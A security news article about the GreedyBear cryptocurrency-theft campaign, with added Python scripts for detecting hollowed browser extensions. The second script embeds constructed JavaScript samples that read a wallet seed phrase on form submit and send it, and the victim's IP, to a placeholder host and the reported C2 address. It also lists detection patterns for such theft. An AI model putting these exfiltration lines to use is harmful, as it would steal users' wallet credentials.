Biggest Ever GreedyBear Attack: 650 Hacking Tools Used to Steal $1 Million from Victims

A sophisticated cybercriminal operation known as GreedyBear has orchestrated one of the most extensive cryptocurrency theft campaigns to date, deploying over 650 malicious tools across multiple attack vectors to steal more than $1 million from unsuspecting victims.

Unlike traditional threat groups that typically specialize in single attack methods, GreedyBear has adopted an industrial-scale approach, simultaneously operating malicious browser extensions, distributing hundreds of malware executables, and maintaining elaborate phishing infrastructure.

The campaign represents a significant escalation in cybercriminal operations, utilizing over 150 weaponized Firefox extensions, nearly 500 malicious Windows executables, and dozens of fraudulent websites masquerading as legitimate cryptocurrency services.

Generic extensions uploaded by the attacker before being weaponized (Source – Medium)

All attack components converge on a centralized command-and-control infrastructure, with domains resolving to the IP address 185.208.156.66, enabling streamlined coordination across multiple threat vectors.

What distinguishes GreedyBear from conventional cybercriminal operations is its systematic approach to scaling attacks using artificial intelligence.

Analysis of the campaign’s code reveals clear signatures of AI-generated artifacts, allowing attackers to rapidly produce diverse payloads while evading traditional detection mechanisms.

Koi Security researchers identified this evolution as part of a broader trend where cybercriminals leverage advanced AI tooling to accelerate attack development and deployment.

The threat group’s browser extension strategy employs a sophisticated technique termed “Extension Hollowing” to circumvent marketplace security controls.

Rather than attempting to sneak malicious extensions past initial reviews, operators first establish legitimate publisher profiles by uploading innocuous utilities such as link sanitizers and YouTube downloaders.

After accumulating positive reviews and user trust, they systematically “hollow out” these extensions, replacing legitimate functionality with credential-harvesting code while preserving the established reputation.
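The hollowing step leaves a trace that a marketplace reviewer or an enterprise extension allow-list process can check mechanically: the manifest of the "updated" version tends to ask for more than the innocuous version ever needed. The script below is an added example, not code from the Koi Security write-up or from any extension involved; the two manifests are constructed for illustration, and the list of permissions treated as risky is the author's own reviewer heuristic, not a standard.

```python
"""Compare two versions of a browser-extension manifest and flag a
sudden expansion of reach that is typical of an 'extension hollowing'
update (benign utility -> credential harvester)."""
import json

# Constructed sample manifests (illustrative; not from any real extension).
BENIGN_V1 = json.dumps({
    "manifest_version": 3,
    "name": "Link Cleaner",
    "version": "1.0.2",
    "permissions": ["activeTab"],
    "host_permissions": [],
    "content_scripts": [],
})

HOLLOWED_V2 = json.dumps({
    "manifest_version": 3,
    "name": "Link Cleaner",
    "version": "1.0.3",
    "permissions": ["activeTab", "storage", "webRequest"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
})

# Match patterns that grant access to every site.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Assumption: a reviewer's list of permissions that let an extension read or
# alter page content, traffic, or other sensitive browser state.
RISKY_PERMISSIONS = {
    "webRequest", "webRequestBlocking", "cookies", "tabs", "clipboardRead",
    "nativeMessaging", "scripting", "declarativeNetRequest",
}


def _content_script_matches(manifest):
    """Collect every URL pattern on which content scripts are injected."""
    matches = set()
    for script in manifest.get("content_scripts", []):
        matches.update(script.get("matches", []))
    return matches


def compare_manifests(old_json, new_json):
    """Return human-readable findings describing how NEW expands on OLD."""
    old, new = json.loads(old_json), json.loads(new_json)
    findings = []

    added_perms = set(new.get("permissions", [])) - set(old.get("permissions", []))
    risky = sorted(added_perms & RISKY_PERMISSIONS)
    if risky:
        findings.append(f"new risky permissions: {risky}")

    added_hosts = set(new.get("host_permissions", [])) - set(old.get("host_permissions", []))
    if added_hosts & BROAD_HOSTS:
        findings.append("host access widened to all sites")
    elif added_hosts:
        findings.append(f"new host permissions: {sorted(added_hosts)}")

    new_matches = _content_script_matches(new) - _content_script_matches(old)
    if new_matches:
        findings.append(f"content scripts now injected on: {sorted(new_matches)}")

    return findings


def is_suspicious_update(old_json, new_json):
    """Treat an update that widens reach in two or more ways as suspect."""
    return len(compare_manifests(old_json, new_json)) >= 2


if __name__ == "__main__":
    for line in compare_manifests(BENIGN_V1, HOLLOWED_V2):
        print("-", line)
    print("suspicious:", is_suspicious_update(BENIGN_V1, HOLLOWED_V2))
```

The caveat is that this catches only the lazy variant of hollowing. An operator who requested broad host access up front, while the extension was still benign, can later swap in harvesting code without touching the manifest at all, so a manifest diff should gate a code review rather than replace one.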

Advanced Credential Harvesting Mechanisms

The weaponized extensions demonstrate remarkable technical sophistication in their credential extraction capabilities.

Download page for one of the trojans on rsload.net (Source – Medium)

Each malicious extension targets popular cryptocurrency wallets including MetaMask, TronLink, Exodus, and Rabby Wallet by precisely mimicking their authentic interfaces.

The malware captures wallet credentials directly from user input fields within the extension’s popup interface, employing JavaScript functions that intercept form submissions before they reach legitimate validation processes.

Wallet-repair services claiming to fix Trezor devices (Source – Medium)

During initialization, the extensions execute additional surveillance functions, transmitting victims’ external IP addresses to remote servers for tracking and potential targeting purposes.

This data collection enables operators to build comprehensive victim profiles while maintaining operational security through distributed infrastructure.

The code snippets reveal standardized credential exfiltration routines across all extensions, suggesting centralized development and deployment protocols that enable rapid scaling of malicious operations while maintaining consistency in attack execution.
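The three behaviours described above (a listener that grabs the seed phrase on form submission, a beacon that ships the victim's external IP to a remote server, and a near-identical exfiltration routine reused across many extensions) are exactly the things a static triage pass over an extension's popup script should surface, together with the single reported C2 address 185.208.156.66. The script below is an added example written for this article, not GreedyBear's code or Koi Security's tooling. The two JavaScript samples are constructed stand-ins for a popup script; the hostnames in them (`wallet-sync.example`, `ip.example`) are placeholders, and the indicator regexes are the author's own heuristics.

```python
"""Static triage of extension JavaScript for wallet-credential harvesting:
form-submit interception, reads of secret fields, outbound network calls,
contact with a known C2 address, and a fingerprint that clusters
extensions sharing the same exfiltration routine."""
import hashlib
import re

# Constructed sample popup scripts (illustrative; not real extension code).
SAMPLE_A = """
document.getElementById('unlock').addEventListener('submit', function (e) {
  e.preventDefault();
  var seed = document.querySelector('#seed').value;
  fetch('https://wallet-sync.example/collect', {method: 'POST', body: JSON.stringify({s: seed})});
});
fetch('https://ip.example/json').then(r => r.json()).then(d => fetch('http://185.208.156.66/ip?a=' + d.ip));
"""

SAMPLE_B = """
// different wallet skin, same routine
document.getElementById('restore').addEventListener('submit', function (e) {
  e.preventDefault();
  var seed = document.querySelector('#seed').value;
  fetch('https://wallet-sync.example/collect', {method: 'POST', body: JSON.stringify({s: seed})});
});
"""

C2_IP = "185.208.156.66"  # address reported for the campaign's infrastructure

# Heuristic indicators (author's assumptions about what harvesting code looks like).
INDICATORS = {
    "form_intercept": re.compile(r"addEventListener\(\s*['\"](submit|input|keyup|change)['\"]"),
    "secret_field_read": re.compile(r"(seed|mnemonic|phrase|password|privateKey)['\"]?\)?\.value", re.I),
    "outbound_post": re.compile(r"\bfetch\(|XMLHttpRequest|navigator\.sendBeacon"),
}
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")


def triage(src):
    """Summarise harvesting indicators and external contacts in one script."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(src))
    hosts = sorted(set(URL_HOST.findall(src)))
    return {
        "indicators": hits,
        "external_hosts": hosts,
        "contacts_c2": C2_IP in hosts,
        # All three together: intercept input, read a secret, send it out.
        "harvester_pattern": set(INDICATORS) <= set(hits),
    }


def handler_body(src, event="submit"):
    """Return the balanced-brace body of the first EVENT listener, or None."""
    m = re.search(r"addEventListener\(\s*['\"]" + re.escape(event) + r"['\"]", src)
    if not m:
        return None
    start = src.index("{", m.end())
    depth = 0
    for j in range(start, len(src)):
        if src[j] == "{":
            depth += 1
        elif src[j] == "}":
            depth -= 1
            if depth == 0:
                return src[start + 1:j]
    return None


def routine_fingerprint(src):
    """Hash the whitespace-normalised submit handler so that extensions with
    different wallet skins but the same exfiltration routine cluster together."""
    body = handler_body(src)
    if body is None:
        return None
    normalised = re.sub(r"\s+", "", body)
    return hashlib.sha256(normalised.encode()).hexdigest()[:16]


if __name__ == "__main__":
    for label, sample in (("A", SAMPLE_A), ("B", SAMPLE_B)):
        print(label, triage(sample), routine_fingerprint(sample))
```

Run against a corpus of unpacked extensions, identical fingerprints are the quickest way to confirm the "centralized development" claim: dozens of differently branded wallet popups collapsing to a handful of handler hashes. The host list is also where the IP-beacon shows up, as a second external host contacted outside any user action; this script does not resolve anything, so pairing the hosts it extracts with DNS or proxy logs is a separate step.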
